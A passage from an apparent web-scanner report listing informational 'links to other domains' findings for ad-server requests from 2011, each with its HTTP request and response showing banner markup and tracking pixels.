Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 3619
Date: Thu, 23 Jun 2011 13:44:36 GMT

var divid='dclkAdsDivID_9741';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_9741 = "<html><head></head><body leftMargin=\"0\" topMargin=\"0\" marginwidth=\"0\" marginheight=\"0\"><a
...[SNIP]...
anoid-about-computer-security-suggests-study-969910%26hl%3Den%26client%3Dca-pub-0492247457835184%26adU%3Dgoogle.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEigiRphzv5D3kwlUT-z9T4a0osBA\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...

11.3. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fut.gb.tr/news.Internet

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet;kw=UK;kw=security;kw=computing;tile=3;dcopt=ist;sz=728x90;rsi=A08721_10342;;gs_cat=antivirus;ord=1100559477?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1435575/Promotion_0621-0730_Branding-PreferredAcct_728x90.jpg

Request

GET /adj/fut.gb.tr/news.Internet;kw=UK;kw=security;kw=computing;tile=3;dcopt=ist;sz=728x90;rsi=A08721_10342;;gs_cat=antivirus;ord=1100559477? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
Cookie: id=2253b03f0e0100a7||t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1258
Date: Thu, 23 Jun 2011 13:48:31 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/d;242797856;0-0;0;45832818;3454-728/90;42738475/42756262/1;;~aopt=0/ff/96/ff;~fdr=242396772;0-0;0;23314830;34
...[SNIP]...
copt=ist;sz=728x90;rsi=A08721_10342;;gs_cat=antivirus;~aopt=2/0/96/0;~sscs=%3fhttp://promotions.newegg.com/NEPA/11-1704/index.html?cm_mmc=BAC-MaximumPCBrand-_-15offPreferred-_-NA-_-NA&nm_mc=ExtBanner"><img src="http://s0.2mdn.net/viewad/1435575/Promotion_0621-0730_Branding-PreferredAcct_728x90.jpg" border=0 alt="Click here"></a>
...[SNIP]...

11.4. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fut.gb.tr/news.Internet

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet;kw=UK;kw=security;kw=computing;tile=2;sz=980x250;;gs_cat=NONE;ord=852301204?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/fut.gb.tr/news.Internet;kw=UK;kw=security;kw=computing;tile=2;sz=980x250;;gs_cat=NONE;ord=852301204? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 313
Date: Thu, 23 Jun 2011 13:44:35 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/a;44306;0-0;0;23314830;26018-980/250;0/0/0;;~okv=;kw=UK;kw=security;kw=computing;tile=2;sz=980x250;;gs_cat=NONE;~aopt=2/1/96/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here"></a>
...[SNIP]...

11.5. http://ad.doubleclick.net/adj/sql.home/database previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/database

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;sz=1x1;tile=7;pos=1_1;ord=79932

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;sz=1x1;tile=7;pos=1_1;ord=79932 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 255
Date: Thu, 23 Jun 2011 13:44:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/m;44306;0-0;0;62427920;31-1/1;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Penton Media - Windows IT Pro, Click Here!"></a>
...[SNIP]...

11.6. http://ad.doubleclick.net/adj/sql.home/database previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/database

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;sz=205x90;tile=2;pos=205_1;ord=79932

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1822442/SQL_CIR_SQLSub_205x90_MCCONNELL_020111-123111.jpg

Request

GET /adj/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;sz=205x90;tile=2;pos=205_1;ord=79932 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 417
Date: Thu, 23 Jun 2011 13:44:28 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/g;235682311;0-0;0;62427920;11140-205/90;40485504/40503291/1;;~sscs=%3fhttp://sqlmag.com/subscribe/tabid/444/List/1/CategoryID/97/Level/a/Default.aspx?code=WP211XSB"><img src="http://s0.2mdn.net/viewad/1822442/SQL_CIR_SQLSub_205x90_MCCONNELL_020111-123111.jpg" border=0 alt="Penton Media - Windows IT Pro, Click Here!"></a>
...[SNIP]...

11.7. http://ad.doubleclick.net/adj/sql.home/database previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/database

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;sz=468x60,728x90;tile=6;pos=728_2;ord=79932

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1841592/SQLdoctor_728x90_June.gif

Request

GET /adj/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;sz=468x60,728x90;tile=6;pos=728_2;ord=79932 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 368
Date: Thu, 23 Jun 2011 13:44:37 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/c;241642232;0-0;0;62427920;3454-728/90;42420659/42438446/1;;~sscs=%3fhttp://www.idera.com/Products/SQL-toolbox/SQL-doctor/?s=WU_SQLMag_doc"><img src="http://s0.2mdn.net/viewad/1841592/SQLdoctor_728x90_June.gif" border=0 alt="Penton Media - Windows IT Pro, Click Here!"></a>
...[SNIP]...

11.8. http://ad.doubleclick.net/adj/sql.home/database previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/database

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;sz=125x125,180x150;tile=3;pos=125_1;ord=79932

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3153401/RON_EMCMay11BL01_KNUDSON_125x125_061211-071511.gif

Request

GET /adj/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;sz=125x125,180x150;tile=3;pos=125_1;ord=79932 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 356
Date: Thu, 23 Jun 2011 13:44:30 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/s;242481768;0-0;0;62427920;3-125/125;42620900/42638687/1;;~sscs=%3fhttp://windowtotheprivatecloud.com"><img src="http://s0.2mdn.net/viewad/3153401/RON_EMCMay11BL01_KNUDSON_125x125_061211-071511.gif" border=0 alt="Penton Media - Windows IT Pro, Click Here!"></a>
...[SNIP]...

11.9. http://ad.doubleclick.net/adj/sql.home/database previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/database

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;sz=300x250,336x280;tile=5;pos=300_2;ord=79932

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3246845/Kaminario_SQLserver_336x280_3.gif

Request

GET /adj/sql.home/database;abr=!webtv;page=/article/sql-server/hardening%20sql%20server-135858;t=sqlserver;t=systemsmanagement;t=databaseadministration;t=security;sz=300x250,336x280;tile=5;pos=300_2;ord=79932 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 354
Date: Thu, 23 Jun 2011 13:44:36 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/t;242488381;0-0;0;62427920;4252-336/280;42624641/42642428/1;;~sscs=%3fhttp://www.theiostorm.com/Kaminario_SQLMag.php"><img src="http://s0.2mdn.net/viewad/3246845/Kaminario_SQLserver_336x280_3.gif" border=0 alt="Penton Media - Windows IT Pro, Click Here!"></a>
...[SNIP]...

11.10. http://ad.doubleclick.net/adj/sql.home/general previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/general

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/sql.home/general;abr=!webtv;page=/categories/category/t-sql-powershell-scripting;sz=300x250,336x280;tile=4;pos=300_1;ord=38875

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3246845/Kaminario_SQLserver_336x280_3.gif

Request

GET /adj/sql.home/general;abr=!webtv;page=/categories/category/t-sql-powershell-scripting;sz=300x250,336x280;tile=4;pos=300_1;ord=38875 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/categories/category/t-sql-powershell-scripting
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 354
Date: Thu, 23 Jun 2011 14:18:10 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/q;242488381;0-0;0;62406184;4252-336/280;42624641/42642428/1;;~sscs=%3fhttp://www.theiostorm.com/Kaminario_SQLMag.php"><img src="http://s0.2mdn.net/viewad/3246845/Kaminario_SQLserver_336x280_3.gif" border=0 alt="Penton Media - Windows IT Pro, Click Here!"></a>
...[SNIP]...

11.11. http://ad.doubleclick.net/adj/sql.home/general previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/general

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/sql.home/general;abr=!webtv;page=/categories/category/t-sql-powershell-scripting;sz=1x1;tile=5;pos=1_1;ord=38875

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/sql.home/general;abr=!webtv;page=/categories/category/t-sql-powershell-scripting;sz=1x1;tile=5;pos=1_1;ord=38875 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/categories/category/t-sql-powershell-scripting
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 255
Date: Thu, 23 Jun 2011 14:18:11 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/n;44306;0-0;0;62406184;31-1/1;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Penton Media - Windows IT Pro, Click Here!"></a>
...[SNIP]...

11.12. http://ad.doubleclick.net/adj/sql.home/general previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sql.home/general

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/sql.home/general;abr=!webtv;page=/categories/category/t-sql-powershell-scripting;sz=205x90;tile=2;pos=205_1;ord=38875

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1822442/SQL_CIR_SQLSub_205x90_MCCONNELL_020111-123111.jpg

Request

GET /adj/sql.home/general;abr=!webtv;page=/categories/category/t-sql-powershell-scripting;sz=205x90;tile=2;pos=205_1;ord=38875 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/categories/category/t-sql-powershell-scripting
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 417
Date: Thu, 23 Jun 2011 14:18:07 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/d;235682311;0-0;0;62406184;11140-205/90;40485504/40503291/1;;~sscs=%3fhttp://sqlmag.com/subscribe/tabid/444/List/1/CategoryID/97/Level/a/Default.aspx?code=WP211XSB"><img src="http://s0.2mdn.net/viewad/1822442/SQL_CIR_SQLSub_205x90_MCCONNELL_020111-123111.jpg" border=0 alt="Penton Media - Windows IT Pro, Click Here!"></a>
...[SNIP]...

11.13. http://adadvisor.net/adscores/g.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/adscores/g.js

Issue detail

The page was loaded from a URL containing a query string:

http://adadvisor.net/adscores/g.js?sid=9201023828

The response contains the following links to other domains:

http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

Request

GET /adscores/g.js?sid=9201023828 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=7937131853506544491&fpid=12&nu=n&t=&sp=n&purl=&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=0001%3AKWC5MC0x1u8zvrMcq4GCWFCj5DwPkE0L

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:55 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 258
Content-Type: application/javascript

document.write('<img src="http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000" height="1" width="1" /><img height="1" width="1" src="http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0" />');

11.14. http://bh.contextweb.com/bh/drts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/drts

Issue detail

The page was loaded from a URL containing a query string:

http://bh.contextweb.com/bh/drts?Rand=PvvmUFgyAOKq

The response contains the following link to another domain:

http://tag.admeld.com/pixel?admeld_adprovider_id=8&_segment=2%7C8vciuQJMXXJY%7CEMON1.13475%7CSHME2.13211%7CHWHS1.13115

Request

GET /bh/drts?Rand=PvvmUFgyAOKq HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531399.1voofy6a0tk1w.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|531292.AG-00000001389358554.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; V=8vciuQJMXXJY; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%0A2866%3B07%2F06%2F2011%3BSHME2; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; cw=cw; FC1-WC=^56837_1_39y0y; vf=1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Cache-Control: private, max-age=0, no-cache, no-store
Expires: -1
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 23 Jun 2011 13:44:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 192

<html>
   <body>
       <img src='http://tag.admeld.com/pixel?admeld_adprovider_id=8&_segment=2%7C8vciuQJMXXJY%7CEMON1.13475%7CSHME2.13211%7CHWHS1.13115' width='1' height='1'/>
   </body>
</html>

11.15. http://cdn.optmd.com/V2/85280/214235/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.optmd.com
Path:	/V2/85280/214235/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://cdn.optmd.com/V2/85280/214235/index.html?g=Af////8=&r=www.techradar.com/news/internet/uk-most-paranoid-about-computer-security-suggests-study-969910

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N5002.Casale/B5115125.23;sz=1x1;ord=852365421
http://c.casalemedia.com/c/1/1/85280/aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9jbGs7MjMzOTQ3MTE5OzU5MzA4NzY0O3U=
http://i.casalemedia.com/imp.gif?c=85280&cr=214235

Request

GET /V2/85280/214235/index.html?g=Af////8=&r=www.techradar.com/news/internet/uk-most-paranoid-about-computer-security-suggests-study-969910 HTTP/1.1
Host: cdn.optmd.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/internet/uk-most-paranoid-about-computer-security-suggests-study-969910

Response

HTTP/1.1 200 OK
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Mon, 07 Feb 2011 19:46:35 GMT
ETag: "4640a3-264-7d46fcc0"
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 612
Date: Thu, 23 Jun 2011 13:49:20 GMT
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Sexy Forever</title></head>
<body style="margin: 0px; padding: 0px; background-color: transparent;">
<a href="http://c.casalemedia.com/c/1/1/85280/aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9jbGs7MjMzOTQ3MTE5OzU5MzA4NzY0O3U=" target="_blank"><img src="over40_720x300.gif" width="720" height="300" border="0" alt="" /></a>
<img src="http://i.casalemedia.com/imp.gif?c=85280&cr=214235" width="1" height="1" alt="" /><img src="http://ad.doubleclick.net/ad/N5002.Casale/B5115125.23;sz=1x1;ord=852365421" width="1" height="1" alt="" />
</body>
...[SNIP]...

11.16. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=themig&can=ffffffffffffffff

The response contains the following link to another domain:

http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=1&can=ffffffffffffffff

Request

GET /pixel?nid=themig&can=ffffffffffffffff HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=1&can=ffffffffffffffff
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 23 Jun 2011 13:44:54 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 305
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=1&can=ffffffffffffffff">here</A>
...[SNIP]...

11.17. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=turn1

The response contains the following link to another domain:

http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEOOGEBTT9OtECB0SEmkPQV4&cver=1

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
